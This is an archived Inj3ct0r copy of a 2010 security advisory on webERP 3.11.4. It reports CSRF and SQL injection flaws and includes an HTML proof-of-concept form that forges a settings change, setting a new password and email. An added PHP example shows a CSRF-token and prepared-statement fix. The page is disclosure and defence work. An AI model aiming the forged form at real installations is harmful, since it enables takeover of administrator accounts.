<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>webERP v3.11.4 Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=======================================
webERP v3.11.4 Multiple Vulnerabilities
=======================================

# Title: webERP Multiple Vulnerabilities
# Author: ADEO Security
# Published: 30/06/2010
# Version: 3.11.4 (Possibly all versions)
# Vendor: http://www.weberp.org

# Description: &quot;webERP is a complete web based accounting/ERP system
that requires only a web-browser and pdf reader to use. It has a wide
range of features suitable for many businesses particularly
distributed businesses in wholesale and distribution. It is developed
as an open-source application and is available as a free download to
use. The feature set is continually expanding as new businesses and
developers adopt it. There are on average 5,000 downloads per month.&quot;

# Credit: Vulnerability found by Canberk BOLAT at ADEO Security Labs
- Mail: security[AT]adeo.com.tr
- Web: http://security.adeo.com.tr

# Vulnerabilities:
1) CSRF: An attacker can add a new administrator to the system. All files
have this issue. See the PoC section below.
2) SQL Injection: The application suggests disabling magic_quotes_gpc.
An attacker can inject SQL code by exploiting the CSRF vulnerability. HTTP
requests must be filtered.

# PoC (CSRF):
&lt;html&gt;
&lt;body&gt;
&lt;form method=&quot;POST&quot; action=&quot;http://server/UserSettings.php?&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;RealName&quot; VALUE=&quot;ADEO-Security&quot;&gt;
&lt;input type='hidden' name='DisplayRecordsMax' VALUE=&quot;10&quot;&gt;
&lt;input type='hidden' name='Language' VALUE='en_US'&gt;
&lt;input type='hidden' name='Theme' VALUE='green'&gt;
&lt;input type='hidden' name='pass' value='adeopass'&gt;
&lt;input type='hidden' name='passcheck' value='adeopass'&gt;
&lt;input type='hidden' name='email' size=40 value='hacked@weberp.org'&gt;
&lt;input type='hidden' name='Modify' value=&quot;Modify&quot;&gt;
&lt;/form&gt;

&lt;/body&gt;
&lt;/html&gt;

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-30]</pre></body></html>
Source: http://inj3ct0r.com/exploits/12964
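
A server-side mitigation for both issues listed in the advisory, as an added example that is not part of the original advisory or of webERP's code: a per-session token that a forged cross-site POST to a form like UserSettings.php cannot supply, and a parameterized UPDATE that does not depend on magic_quotes_gpc. The function names, the FormID field, the www_users schema and the in-memory SQLite database (PHP 7+ with pdo_sqlite) are assumptions for the demonstration.

```php
<?php
// Added example, not webERP code. Function names, the FormID field and the
// www_users schema are assumptions made for this demonstration.

function csrf_token(array &$session): string {
    // One unpredictable token per session, emitted as a hidden field in every form.
    if (empty($session['FormID'])) {
        $session['FormID'] = bin2hex(random_bytes(32));
    }
    return $session['FormID'];
}

function csrf_valid(array $session, array $post): bool {
    // A token missing on either side fails; the comparison is constant-time.
    return isset($session['FormID'], $post['FormID'])
        && is_string($post['FormID'])
        && hash_equals($session['FormID'], $post['FormID']);
}

function update_settings(PDO $db, array $session, array $post): bool {
    if (!csrf_valid($session, $post)) {
        return false; // cross-site POST without the token: reject, change nothing
    }
    // Bound parameters keep request data out of the SQL text, so the query
    // behaves the same whether magic_quotes_gpc is on or off.
    $stmt = $db->prepare('UPDATE www_users SET realname = ?, email = ? WHERE userid = ?');
    return $stmt->execute([$post['RealName'], $post['email'], $session['UserID']]);
}

// Constructed demo data: one user row in an in-memory database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE www_users (userid TEXT PRIMARY KEY, realname TEXT, email TEXT)');
$db->exec("INSERT INTO www_users VALUES ('admin', 'Site Admin', 'admin@example.test')");

$session = ['UserID' => 'admin'];
$token = csrf_token($session);

// Request shaped like the advisory's PoC: the session is valid but no token is sent.
$forged = ['RealName' => 'x', 'email' => 'other@example.test', 'Modify' => 'Modify'];
var_dump(update_settings($db, $session, $forged));

// Same-site submission carrying the token, with a quote character in the data.
$legit = ['RealName' => "O'Brien", 'email' => 'ob@example.test', 'FormID' => $token];
var_dump(update_settings($db, $session, $legit));

echo $db->query("SELECT realname || ' / ' || email FROM www_users")->fetchColumn(), "\n";
```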